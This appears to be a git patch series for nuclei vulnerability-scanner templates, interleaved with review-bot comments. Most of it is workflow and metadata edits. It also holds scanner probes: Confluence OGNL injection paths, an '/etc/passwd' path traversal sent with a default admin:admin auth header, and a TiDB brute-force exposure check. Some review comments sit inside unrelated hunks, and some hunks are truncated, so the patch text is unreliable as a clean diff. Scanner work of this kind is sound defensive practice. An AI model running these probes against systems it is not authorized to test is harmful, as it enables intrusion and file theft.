9c61e4830c..e94191bb2d 100644 --- a/workflows/sap-netweaver-workflow.yaml +++ b/workflows/sap-netweaver-workflow.yaml 
@@ -4,7 +4,6 @@ info: name: SAP NetWaver Security Checks author: dwisiswant0 description: A simple workflow that runs all SAP NetWaver related nuclei templates on a given target. - tags: workflow workflows: - template: technologies/sap-netweaver-detect.yaml # HTTP Templates diff --git a/workflows/solarwinds-orion-workflow.yaml b/workflows/solarwinds-orion-workflow.yaml index 3dc656fc4b..8596d03e7b 100644 --- a/workflows/solarwinds-orion-workflow.yaml +++ b/workflows/solarwinds-orion-workflow.yaml @@ -4,10 +4,6 @@ info: name: SolarWinds Orion Security Checks author: dwisiswant0 description: A simple workflow that runs all SolarWinds Orion related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - template: exposed-panels/solarwinds-orion.yaml diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml index acaad19e2b..86abcd4af0 100644 --- a/workflows/springboot-workflow.yaml +++ b/workflows/springboot-workflow.yaml @@ -4,13 +4,8 @@ info: name: Spring Boot Security Checks author: dwisiswant0 description: A simple workflow that runs all Spring Boot related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/springboot-actuator.yaml subtemplates: - tags: springboot diff --git a/workflows/thinkcmf-workflow.yaml b/workflows/thinkcmf-workflow.yaml index 13462302b0..106e8a23b2 100644 --- a/workflows/thinkcmf-workflow.yaml +++ b/workflows/thinkcmf-workflow.yaml 
@@ -3,10 +3,8 @@ info: name: ThinkCMF Security Checks author: pdteam description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target. - tags: workflow workflows: - - template: technologies/thinkcmf-detection.yaml subtemplates: - template: vulnerabilities/thinkcmf/ \ No newline at end of file diff --git a/workflows/thinkphp-workflow.yaml b/workflows/thinkphp-workflow.yaml index 832c163af2..f71f3195e7 100644 --- a/workflows/thinkphp-workflow.yaml +++ b/workflows/thinkphp-workflow.yaml @@ -3,10 +3,8 @@ info: name: ThinkPHP Security Checks author: dr_set description: A simple workflow that runs all ThinkPHP related nuclei templates on a given target. - tags: workflow workflows: - - template: technologies/tech-detect.yaml matchers: - name: thinkphp diff --git a/workflows/vbulletin-workflow.yaml b/workflows/vbulletin-workflow.yaml index ddf77dc573..872d1f23ae 100644 --- a/workflows/vbulletin-workflow.yaml +++ b/workflows/vbulletin-workflow.yaml @@ -4,15 +4,9 @@ info: name: vBulletin Security Checks author: pdteam description: A simple workflow that runs all vBulletin related nuclei templates on a given target. - tags: workflow - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. workflows: - - template: technologies/tech-detect.yaml - matchers: - name: vbulletin subtemplates: diff --git a/workflows/weblogic-workflow.yaml b/workflows/weblogic-workflow.yaml index 5834b6ca3e..fcca4c6bd8 100755 --- a/workflows/weblogic-workflow.yaml +++ b/workflows/weblogic-workflow.yaml @@ -3,10 +3,8 @@ info: name: WebLogic Security Checks author: dr_set description: A simple workflow that runs all WebLogic related nuclei templates on a given target. - tags: workflow workflows: - - template: technologies/weblogic-detect.yaml subtemplates: 
diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index e7ce984db9..e9ebc836f1 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -3,7 +3,6 @@ info: name: Wordpress Security Checks author: kiblyn11,zomsop82 description: A simple workflow that runs all wordpress related nuclei templates on a given target. - tags: workflow workflows: From 1a69647ed1ff83bf049561daa213d5ec0b9154d8 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 9 Sep 2021 17:35:30 -0300 Subject: [PATCH 124/339] Create confluence-workflow.yaml --- workflows/confluence-workflow.yaml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 workflows/confluence-workflow.yaml diff --git a/workflows/confluence-workflow.yaml b/workflows/confluence-workflow.yaml new file mode 100644 index 0000000000..23f3652e63 --- /dev/null +++ b/workflows/confluence-workflow.yaml @@ -0,0 +1,14 @@ +id: confluence-workflow + +info: + name: Atlassian's Confluence workflow + author: philippedelteil + description: Workflow that runs all Confluence related nuclei templates + tags: workflow + +workflows: + + - template: technologies/confluence-detect.yaml + subtemplates: + - tags: confluence + From bcc55f6a3fa4b4ab09dac94e64a2f43d33f20a2d Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 9 Sep 2021 17:38:22 -0300 Subject: [PATCH 125/339] Update CVE-2021-26084.yaml Some targets worked without the ?SpaceKey=x --- cves/2021/CVE-2021-26084.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index 1ef19a23c1..54134b92e1 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml 
@@ -24,8 +24,11 @@ requests:
 payloads:
 path:
 - pages/createpage-entervariables.action?SpaceKey=x
+ - pages/createpage-entervariables.action
 - confluence/pages/createpage-entervariables.action?SpaceKey=x
+ - confluence/pages/createpage-entervariables.action
 - wiki/pages/createpage-entervariables.action?SpaceKey=x
+ - wiki/pages/createpage-entervariables.action
 - pages/doenterpagevariables.action
 - pages/createpage.action?spaceKey=myproj
 - pages/templates2/viewpagetemplate.action
From 5fe59db1ca986603cb5065d8ad032d15c6d3bec8 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 10 Sep 2021 11:17:34 +0530
Subject: [PATCH 126/339] Update confluence-workflow.yaml
---
workflows/confluence-workflow.yaml | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/workflows/confluence-workflow.yaml b/workflows/confluence-workflow.yaml
index 23f3652e63..28f7500d4c 100644
--- a/workflows/confluence-workflow.yaml
+++ b/workflows/confluence-workflow.yaml
@@ -1,7 +1,7 @@
 id: confluence-workflow
 info:
- name: Atlassian's Confluence workflow
+ name: Atlassian Confluence workflow
 author: philippedelteil
 description: Workflow that runs all Confluence related nuclei templates
 tags: workflow
@@ -11,4 +11,3 @@ workflows:
 - template: technologies/confluence-detect.yaml
 subtemplates:
 - tags: confluence
-
From 473bcb9c16c6b9d3574cd08b08db42767120c95f Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 10 Sep 2021 11:17:48 +0530
Subject: [PATCH 127/339] Update confluence-workflow.yaml
---
workflows/confluence-workflow.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/workflows/confluence-workflow.yaml b/workflows/confluence-workflow.yaml
index 28f7500d4c..1830dfb187 100644
--- a/workflows/confluence-workflow.yaml
+++ b/workflows/confluence-workflow.yaml
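Review bot: The three new `SpaceKey`-less entries double the probes against the same three handlers, and nothing in the hunk stops after the first hit, so a vulnerable instance receives the OGNL payload up to six times; the enclosing request block and its attack mode start above the hunk, so I cannot see whether it already sets `stop-at-first-match: true`. If it does not, add it so the first successful injection ends the template. The commit message records that some targets only worked without the query string; a short comment next to the new entries, `# variants without SpaceKey: some instances only respond to the bare action`, would stop a later cleanup from removing them as duplicates.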
@@ -3,7 +3,7 @@ id: confluence-workflow info: name: Atlassian Confluence workflow author: philippedelteil - description: Workflow that runs all Confluence related nuclei templates + description: Workflow that runs all Confluence related nuclei templates tags: workflow workflows: From 7491a628b158a96325c341aaee7517d62952f6ed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 11:24:16 +0530 Subject: [PATCH 128/339] Update tomcat-detect.yaml --- technologies/tomcat-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/technologies/tomcat-detect.yaml b/technologies/tomcat-detect.yaml index 5561dba63d..f78c945a3e 100644 --- a/technologies/tomcat-detect.yaml +++ b/technologies/tomcat-detect.yaml @@ -1,7 +1,7 @@ -id: tomcat-version +id: tomcat-detect info: - name: Detect Tomcat Version + name: Tomcat Version Detect author: philippedelteil description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. severity: info @@ -28,4 +28,4 @@ requests: name: version group: 2 regex: - - '(
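Review bot: The description kept on the tomcat-detect context line is awkward English: `If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version.` Suggest `If a Tomcat instance is deployed at the target URL, a request for a non-existent resource returns a Tomcat error page that discloses the version.` The template id is renamed for the second time in this series (`tomcat-version-detect` to `tomcat-version` earlier, now `tomcat-detect`), so any workflow or documentation that references it by id needs the same update, which this hunk does not show. The extractor hunk that follows continues past the visible text.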

)(.*?)(

)' \ No newline at end of file + - '(

)(.*?)(

)'
From 9661f57b97351469917480c691f857f828624c29 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 10 Sep 2021 11:27:34 +0530
Subject: [PATCH 129/339] Update confluence-workflow.yaml
---
workflows/confluence-workflow.yaml | 1 -
1 file changed, 1 deletion(-)
diff --git a/workflows/confluence-workflow.yaml b/workflows/confluence-workflow.yaml
index 1830dfb187..4636d6c85c 100644
--- a/workflows/confluence-workflow.yaml
+++ b/workflows/confluence-workflow.yaml
@@ -4,7 +4,6 @@ info:
 name: Atlassian Confluence workflow
 author: philippedelteil
 description: Workflow that runs all Confluence related nuclei templates
- tags: workflow
 workflows:
From 13ec24c2e321397a0d3e22392e4a99574fddb651 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 10 Sep 2021 12:01:01 +0530
Subject: [PATCH 130/339] Update CVE-2018-15535.yaml
---
cves/2018/CVE-2018-15535.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2018/CVE-2018-15535.yaml b/cves/2018/CVE-2018-15535.yaml
index 5c53de530e..4c6646ce68 100644
--- a/cves/2018/CVE-2018-15535.yaml
+++ b/cves/2018/CVE-2018-15535.yaml
@@ -3,7 +3,7 @@ id: CVE-2018-15535
 info:
 name: Responsive FileManager < 9.13.4 - Directory Traversal
 author: daffainfo
- severity: high
+ severity: medium
 description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal.
 reference:
 - https://www.exploit-db.com/exploits/45271
From f01985b0a62c901d203df6f2fc89c676627cb5cd Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 10 Sep 2021 12:06:54 +0530
Subject: [PATCH 131/339] Update karel-ip-phone-lfi.yaml
---
karel-ip-phone-lfi.yaml | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
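Review bot: The severity is lowered from `high` to `medium` with no justification, while the context description still describes a path traversal in `filemanager/ajax_calls.php` that resolves `..` outside the restricted directory, i.e. arbitrary file read by whoever can reach the endpoint. If the intent is to track a CVSS score, say so next to the field, e.g. `severity: medium  # per <source> CVSS v3 rating`; if I recall correctly NVD places this CVE in the High band, in which case the downgrade should be reverted or argued explicitly. The later "cve annotations + severity adjustments" commit in this series also touches this file, so whichever rating it records should be the one that stands.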
diff --git a/karel-ip-phone-lfi.yaml b/karel-ip-phone-lfi.yaml
index d911d65f7e..8d8787781f 100644
--- a/karel-ip-phone-lfi.yaml
+++ b/karel-ip-phone-lfi.yaml
@@ -13,7 +13,8 @@ requests:
 - method: GET
 path:
 - "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
-
+ headers:
+ Authorization: Basic YWRtaW46YWRtaW4=
 matchers-condition: and
 matchers:
From 986510dfc3f0a3fa16c69d665e28fafc337a1a4c Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 10 Sep 2021 12:13:16 +0530
Subject: [PATCH 132/339] Update tidb-native-cred-bruteforce.yaml
---
network/tidb-native-cred-bruteforce.yaml | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/network/tidb-native-cred-bruteforce.yaml b/network/tidb-native-cred-bruteforce.yaml
index 6344da325e..a72290581b 100644
--- a/network/tidb-native-cred-bruteforce.yaml
+++ b/network/tidb-native-cred-bruteforce.yaml
@@ -4,8 +4,8 @@ info:
 name: TiDB DB with enabled native password
 author: lu4nx
 severity: info
- tags: network,tidb,bruteforce,database
 description: TiDB is fully compatible with the MySQL 5.7 protocol and the common features and syntax of MySQL 5.7. TiDB instance with enabled native password support prone vulnerable for password brute-force attack.
+ tags: network,tidb,bruteforce,db
 network:
 - host:
@@ -17,3 +17,4 @@ network:
 words:
 - "mysql_native_password"
 - "TiDB"
+ condition: and
From 83bedfc6af0d8b7bd91b9f0c8b07043f1c7d4e15 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 10 Sep 2021 12:14:04 +0530
Subject: [PATCH 133/339] Rename tidb-native-cred-bruteforce.yaml to tidb-native-password-bruteforce.yaml
---
...-cred-bruteforce.yaml => tidb-native-password-bruteforce.yaml} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename network/{tidb-native-cred-bruteforce.yaml => tidb-native-password-bruteforce.yaml} (100%)
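Review bot: The added `Authorization: Basic YWRtaW46YWRtaW4=` is the base64 of `admin:admin`, so the traversal request now only succeeds on phones still running factory credentials, yet nothing in the hunk records that; the id, description and tags above the hunk still present this as a plain LFI, and a consumer of the result has no way to know a default login was exercised. Add a comment on the header line, `# YWRtaW46YWRtaW4= is admin:admin - the traversal needs auth, so a hit also proves default credentials`, and add `default-login` to the template's tags where they are defined. The file also lives at the repository root (`karel-ip-phone-lfi.yaml`) rather than under the `vulnerabilities/` tree the rest of this series uses, which looks like a misplacement worth fixing in the same change.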
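Review bot: `condition: and` is the right fix (before it, either `mysql_native_password` or `TiDB` alone in the handshake satisfied the word matcher), but the description kept on the context line is hard to read: `TiDB instance with enabled native password support prone vulnerable for password brute-force attack.` Suggest `A TiDB instance with mysql_native_password authentication enabled accepts password guesses and is therefore exposed to brute-force attacks.` Nothing in the hunk shows a login attempt, only banner matching, so the `bruteforce` tag and the filename in the following rename overstate what the template does; `native-password-detect` would describe it more honestly.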
diff --git a/network/tidb-native-cred-bruteforce.yaml b/network/tidb-native-password-bruteforce.yaml similarity index 100% rename from network/tidb-native-cred-bruteforce.yaml rename to network/tidb-native-password-bruteforce.yaml From 1c829f9a0575481ee919c8306f653a165c695c63 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 10 Sep 2021 12:33:41 +0530 Subject: [PATCH 134/339] Update ibm-security-access-manager.yaml --- exposed-panels/ibm-security-access-manager.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/exposed-panels/ibm-security-access-manager.yaml b/exposed-panels/ibm-security-access-manager.yaml index 91e521e81c..3d2e8aa816 100644 --- a/exposed-panels/ibm-security-access-manager.yaml +++ b/exposed-panels/ibm-security-access-manager.yaml @@ -12,18 +12,17 @@ requests: path: - "{{BaseURL}}" - matchers-condition: and + matchers-condition: or matchers: - - type: status - status: - - 200 - type: word words: - "IBM Security Access Manager" - "<h2>IBM Security" - "<em>Access Manager" + part: body condition: and + - type: word part: header words: - - "text/html" + - "IBM Security Access Manager for Web" From e9f728c321699cc97abcf48a6dfb33e04b059d36 Mon Sep 17 00:00:00 2001 
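Review bot: Switching to `matchers-condition: or` and deleting the status matcher lets the new header-only matcher decide by itself: any response carrying `IBM Security Access Manager for Web` in a header is reported as an exposed panel regardless of status code or body. If that string is emitted by an ISAM reverse proxy fronting other applications (it is the WebSEAL product name, which I cannot confirm from the hunk), every application behind it will be flagged as a panel. Either keep the body matcher as the sole signal, or note the intended trade-off in the description, e.g. `# header match alone fires on anything served through an ISAM/WebSEAL proxy`, so reviewers of the results know why the hit rate is broader.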
From: Ice3man543 <nizamulrana@gmail.com> Date: Fri, 10 Sep 2021 16:56:40 +0530 Subject: [PATCH 135/339] Added cve annotations + severity adjustments --- cves/2011/CVE-2011-4336.yaml | 5 +++++ cves/2012/CVE-2012-4242.yaml | 1 + cves/2013/CVE-2013-2287.yaml | 1 + cves/2013/CVE-2013-3526.yaml | 1 + cves/2014/CVE-2014-2323.yaml | 5 +++++ cves/2014/CVE-2014-3744.yaml | 5 +++++ cves/2014/CVE-2014-4210.yaml | 1 + cves/2014/CVE-2014-4535.yaml | 6 ++++++ cves/2014/CVE-2014-4536.yaml | 6 ++++++ cves/2014/CVE-2014-6271.yaml | 7 ++++++- cves/2014/CVE-2014-6308.yaml | 1 + cves/2014/CVE-2014-9094.yaml | 1 + cves/2015/CVE-2015-1000012.yaml | 6 ++++++ cves/2015/CVE-2015-2080.yaml | 7 ++++++- cves/2015/CVE-2015-2807.yaml | 1 + cves/2015/CVE-2015-6544.yaml | 5 +++++ cves/2015/CVE-2015-8349.yaml | 5 +++++ cves/2015/CVE-2015-8399.yaml | 5 +++++ cves/2015/CVE-2015-8813.yaml | 5 +++++ cves/2015/CVE-2015-9414.yaml | 6 ++++++ cves/2015/CVE-2015-9480.yaml | 6 ++++++ cves/2016/CVE-2016-0957.yaml | 4 ++++ cves/2016/CVE-2016-1000126.yaml | 6 ++++++ cves/2016/CVE-2016-1000127.yaml | 5 +++++ cves/2016/CVE-2016-1000128.yaml | 5 +++++ cves/2016/CVE-2016-1000129.yaml | 5 +++++ cves/2016/CVE-2016-1000130.yaml | 5 +++++ cves/2016/CVE-2016-1000131.yaml | 6 ++++++ cves/2016/CVE-2016-1000132.yaml | 5 +++++ cves/2016/CVE-2016-1000133.yaml | 5 +++++ cves/2016/CVE-2016-1000134.yaml | 5 +++++ cves/2016/CVE-2016-1000135.yaml | 5 +++++ cves/2016/CVE-2016-1000137.yaml | 6 ++++++ cves/2016/CVE-2016-1000138.yaml | 6 ++++++ cves/2016/CVE-2016-1000139.yaml | 6 ++++++ cves/2016/CVE-2016-1000140.yaml | 6 ++++++ cves/2016/CVE-2016-1000146.yaml | 6 ++++++ cves/2016/CVE-2016-1000148.yaml | 6 ++++++ cves/2016/CVE-2016-1000149.yaml | 6 ++++++ cves/2016/CVE-2016-1000152.yaml | 5 +++++ cves/2016/CVE-2016-1000153.yaml | 6 ++++++ cves/2016/CVE-2016-1000154.yaml | 5 +++++ cves/2016/CVE-2016-1000155.yaml | 6 ++++++ cves/2016/CVE-2016-10033.yaml | 7 ++++++- cves/2016/CVE-2016-10956.yaml | 5 +++++ cves/2016/CVE-2016-10960.yaml 
| 7 ++++++- cves/2016/CVE-2016-10993.yaml | 6 ++++++ cves/2016/CVE-2016-2004.yaml | 5 +++++ cves/2016/CVE-2016-2389.yaml | 5 +++++ cves/2016/CVE-2016-3081.yaml | 5 +++++ cves/2016/CVE-2016-5649.yaml | 5 +++++ cves/2016/CVE-2016-6277.yaml | 7 ++++++- cves/2016/CVE-2016-7552.yaml | 5 +++++ cves/2016/CVE-2016-7981.yaml | 5 +++++ cves/2017/CVE-2017-1000028.yaml | 5 +++++ cves/2017/CVE-2017-1000170.yaml | 5 +++++ cves/2017/CVE-2017-1000486.yaml | 5 +++++ cves/2017/CVE-2017-10075.yaml | 6 +++++- cves/2017/CVE-2017-10271.yaml | 4 ++++ cves/2017/CVE-2017-11444.yaml | 7 ++++++- cves/2017/CVE-2017-12149.yaml | 5 +++++ cves/2017/CVE-2017-12542.yaml | 4 ++++ cves/2017/CVE-2017-12611.yaml | 5 +++++ cves/2017/CVE-2017-12615.yaml | 7 ++++++- cves/2017/CVE-2017-12629.yaml | 6 ++++++ cves/2017/CVE-2017-12635.yaml | 7 ++++++- cves/2017/CVE-2017-12637.yaml | 5 +++++ cves/2017/CVE-2017-12794.yaml | 5 +++++ cves/2017/CVE-2017-14535.yaml | 6 ++++++ cves/2017/CVE-2017-14537.yaml | 5 +++++ cves/2017/CVE-2017-14651.yaml | 9 +++++++++ cves/2017/CVE-2017-14849.yaml | 9 +++++++++ cves/2017/CVE-2017-15647.yaml | 7 ++++++- cves/2017/CVE-2017-15715.yaml | 5 +++++ cves/2017/CVE-2017-15944.yaml | 6 +++++- cves/2017/CVE-2017-16806.yaml | 6 ++++++ cves/2017/CVE-2017-16877.yaml | 5 +++++ cves/2017/CVE-2017-17043.yaml | 5 +++++ cves/2017/CVE-2017-17059.yaml | 5 +++++ cves/2017/CVE-2017-17451.yaml | 5 +++++ cves/2017/CVE-2017-17562.yaml | 5 +++++ cves/2017/CVE-2017-18024.yaml | 5 +++++ cves/2017/CVE-2017-18536.yaml | 5 +++++ cves/2017/CVE-2017-18638.yaml | 5 +++++ cves/2017/CVE-2017-3506.yaml | 4 ++++ cves/2017/CVE-2017-3528.yaml | 8 +++++++- cves/2017/CVE-2017-3881.yaml | 5 +++++ cves/2017/CVE-2017-4011.yaml | 5 +++++ cves/2017/CVE-2017-5487.yaml | 7 ++++++- cves/2017/CVE-2017-5521.yaml | 7 ++++++- cves/2017/CVE-2017-5638.yaml | 5 +++++ cves/2017/CVE-2017-6090.yaml | 8 +++++++- cves/2017/CVE-2017-7269.yaml | 5 +++++ cves/2017/CVE-2017-7391.yaml | 5 +++++ cves/2017/CVE-2017-7615.yaml | 5 +++++ 
cves/2017/CVE-2017-7921.yaml | 7 ++++++- cves/2017/CVE-2017-8917.yaml | 7 ++++++- cves/2017/CVE-2017-9140.yaml | 5 +++++ cves/2017/CVE-2017-9288.yaml | 5 +++++ cves/2017/CVE-2017-9506.yaml | 7 ++++++- cves/2017/CVE-2017-9791.yaml | 5 +++++ cves/2017/CVE-2017-9805.yaml | 7 ++++++- cves/2017/CVE-2017-9822.yaml | 5 +++++ cves/2017/CVE-2017-9841.yaml | 7 ++++++- cves/2018/CVE-2018-0296.yaml | 8 +++++++- cves/2018/CVE-2018-1000129.yaml | 12 +++++++++++- cves/2018/CVE-2018-1000130.yaml | 8 ++++++++ cves/2018/CVE-2018-1000533.yaml | 5 +++++ cves/2018/CVE-2018-1000600.yaml | 7 ++++++- cves/2018/CVE-2018-1000861.yaml | 6 ++++++ cves/2018/CVE-2018-10095.yaml | 5 +++++ cves/2018/CVE-2018-10141.yaml | 5 +++++ cves/2018/CVE-2018-10822.yaml | 5 +++++ cves/2018/CVE-2018-11409.yaml | 6 ++++++ cves/2018/CVE-2018-11709.yaml | 5 +++++ cves/2018/CVE-2018-11759.yaml | 8 +++++++- cves/2018/CVE-2018-11776.yaml | 8 +++++++- cves/2018/CVE-2018-11784.yaml | 5 +++++ cves/2018/CVE-2018-12031.yaml | 7 ++++++- cves/2018/CVE-2018-1207.yaml | 5 +++++ cves/2018/CVE-2018-12095.yaml | 5 +++++ cves/2018/CVE-2018-1247.yaml | 13 ++++++++++++- cves/2018/CVE-2018-12613.yaml | 8 +++++++- cves/2018/CVE-2018-12634.yaml | 7 ++++++- cves/2018/CVE-2018-1271.yaml | 8 +++++++- cves/2018/CVE-2018-1273.yaml | 5 +++++ cves/2018/CVE-2018-1335.yaml | 7 ++++++- cves/2018/CVE-2018-13379.yaml | 11 ++++++++++- cves/2018/CVE-2018-13380.yaml | 5 +++++ cves/2018/CVE-2018-14013.yaml | 5 +++++ cves/2018/CVE-2018-14064.yaml | 7 ++++++- cves/2018/CVE-2018-14574.yaml | 15 ++++++++++++++- cves/2018/CVE-2018-14728.yaml | 11 ++++++++++- cves/2018/CVE-2018-15473.yaml | 7 ++++++- cves/2018/CVE-2018-15517.yaml | 7 ++++++- cves/2018/CVE-2018-15535.yaml | 7 ++++++- cves/2018/CVE-2018-15745.yaml | 5 +++++ cves/2018/CVE-2018-16059.yaml | 6 ++++++ cves/2018/CVE-2018-16167.yaml | 5 +++++ cves/2018/CVE-2018-16283.yaml | 6 ++++++ cves/2018/CVE-2018-16288.yaml | 5 +++++ cves/2018/CVE-2018-16299.yaml | 5 +++++ cves/2018/CVE-2018-16668.yaml | 5 
+++++ cves/2018/CVE-2018-16670.yaml | 5 +++++ cves/2018/CVE-2018-16671.yaml | 5 +++++ cves/2018/CVE-2018-16763.yaml | 6 ++++++ cves/2018/CVE-2018-17246.yaml | 7 ++++++- cves/2018/CVE-2018-17254.yaml | 7 ++++++- cves/2018/CVE-2018-17431.yaml | 5 +++++ cves/2018/CVE-2018-18069.yaml | 7 +++++++ cves/2018/CVE-2018-18775.yaml | 5 +++++ cves/2018/CVE-2018-18777.yaml | 7 ++++++- cves/2018/CVE-2018-18778.yaml | 7 ++++++- cves/2018/CVE-2018-19386.yaml | 6 ++++++ cves/2018/CVE-2018-19439.yaml | 11 ++++++++++- cves/2018/CVE-2018-19458.yaml | 5 +++++ cves/2018/CVE-2018-20462.yaml | 5 +++++ cves/2018/CVE-2018-20470.yaml | 5 +++++ cves/2018/CVE-2018-20824.yaml | 7 +++++++ cves/2018/CVE-2018-20985.yaml | 7 ++++++- cves/2018/CVE-2018-2392.yaml | 5 +++++ cves/2018/CVE-2018-2628.yaml | 8 +++++++- cves/2018/CVE-2018-2791.yaml | 11 ++++++++++- cves/2018/CVE-2018-2893.yaml | 7 ++++++- cves/2018/CVE-2018-2894.yaml | 4 ++++ cves/2018/CVE-2018-3167.yaml | 10 +++++++++- cves/2018/CVE-2018-3714.yaml | 8 +++++++- cves/2018/CVE-2018-3760.yaml | 5 +++++ cves/2018/CVE-2018-3810.yaml | 6 ++++++ cves/2018/CVE-2018-5230.yaml | 8 ++++++++ cves/2018/CVE-2018-5233.yaml | 5 +++++ cves/2018/CVE-2018-5316.yaml | 5 +++++ cves/2018/CVE-2018-6008.yaml | 5 +++++ cves/2018/CVE-2018-6910.yaml | 5 +++++ cves/2018/CVE-2018-7251.yaml | 14 +++++++++++++- cves/2018/CVE-2018-7422.yaml | 5 +++++ cves/2018/CVE-2018-7490.yaml | 10 ++++++++++ cves/2018/CVE-2018-7600.yaml | 6 ++++++ cves/2018/CVE-2018-7700.yaml | 6 ++++++ cves/2018/CVE-2018-8006.yaml | 17 +++++++++++++++++ cves/2018/CVE-2018-8033.yaml | 7 +++++++ cves/2018/CVE-2018-8715.yaml | 5 +++++ cves/2018/CVE-2018-8719.yaml | 5 +++++ cves/2018/CVE-2018-8770.yaml | 5 +++++ cves/2018/CVE-2018-9118.yaml | 5 +++++ cves/2018/CVE-2018-9995.yaml | 6 +++++- cves/2019/CVE-2019-0193.yaml | 7 ++++++- cves/2019/CVE-2019-0221.yaml | 7 ++++++- cves/2019/CVE-2019-0230.yaml | 7 ++++++- cves/2019/CVE-2019-10068.yaml | 5 +++++ cves/2019/CVE-2019-10092.yaml | 5 +++++ 
cves/2019/CVE-2019-1010287.yaml | 8 +++++++- cves/2019/CVE-2019-10475.yaml | 10 ++++++++++ cves/2019/CVE-2019-11013.yaml | 8 +++++++- cves/2019/CVE-2019-11248.yaml | 7 ++++++- cves/2019/CVE-2019-11510.yaml | 8 +++++++- cves/2019/CVE-2019-11580.yaml | 4 ++++ cves/2019/CVE-2019-11581.yaml | 5 +++++ cves/2019/CVE-2019-11869.yaml | 5 +++++ cves/2019/CVE-2019-12276.yaml | 5 +++++ cves/2019/CVE-2019-12314.yaml | 7 ++++++- cves/2019/CVE-2019-12461.yaml | 5 +++++ cves/2019/CVE-2019-12593.yaml | 5 +++++ cves/2019/CVE-2019-12616.yaml | 5 +++++ cves/2019/CVE-2019-12725.yaml | 5 +++++ cves/2019/CVE-2019-13101.yaml | 5 +++++ cves/2019/CVE-2019-13462.yaml | 5 +++++ cves/2019/CVE-2019-14205.yaml | 5 +++++ cves/2019/CVE-2019-14223.yaml | 7 ++++++- cves/2019/CVE-2019-14312.yaml | 7 ++++++- cves/2019/CVE-2019-14322.yaml | 9 +++++++++ cves/2019/CVE-2019-14470.yaml | 6 ++++++ cves/2019/CVE-2019-14696.yaml | 6 ++++++ cves/2019/CVE-2019-14974.yaml | 10 +++++++++- cves/2019/CVE-2019-15043.yaml | 7 ++++++- cves/2019/CVE-2019-15107.yaml | 7 ++++++- cves/2019/CVE-2019-15501.yaml | 6 ++++++ cves/2019/CVE-2019-15713.yaml | 5 +++++ cves/2019/CVE-2019-15858.yaml | 5 +++++ cves/2019/CVE-2019-15859.yaml | 5 +++++ cves/2019/CVE-2019-15889.yaml | 5 +++++ cves/2019/CVE-2019-16097.yaml | 7 ++++++- cves/2019/CVE-2019-16278.yaml | 6 ++++++ cves/2019/CVE-2019-16313.yaml | 5 +++++ cves/2019/CVE-2019-16332.yaml | 5 +++++ cves/2019/CVE-2019-16525.yaml | 5 +++++ cves/2019/CVE-2019-1653.yaml | 5 +++++ cves/2019/CVE-2019-16662.yaml | 6 ++++++ cves/2019/CVE-2019-16759.yaml | 8 +++++++- cves/2019/CVE-2019-16920.yaml | 5 +++++ cves/2019/CVE-2019-17270.yaml | 7 ++++++- cves/2019/CVE-2019-17382.yaml | 5 +++++ cves/2019/CVE-2019-17503.yaml | 5 +++++ cves/2019/CVE-2019-17506.yaml | 5 +++++ cves/2019/CVE-2019-17538.yaml | 6 ++++++ cves/2019/CVE-2019-17558.yaml | 8 +++++++- cves/2019/CVE-2019-18393.yaml | 7 ++++++- cves/2019/CVE-2019-18394.yaml | 5 +++++ cves/2019/CVE-2019-18818.yaml | 5 +++++ 
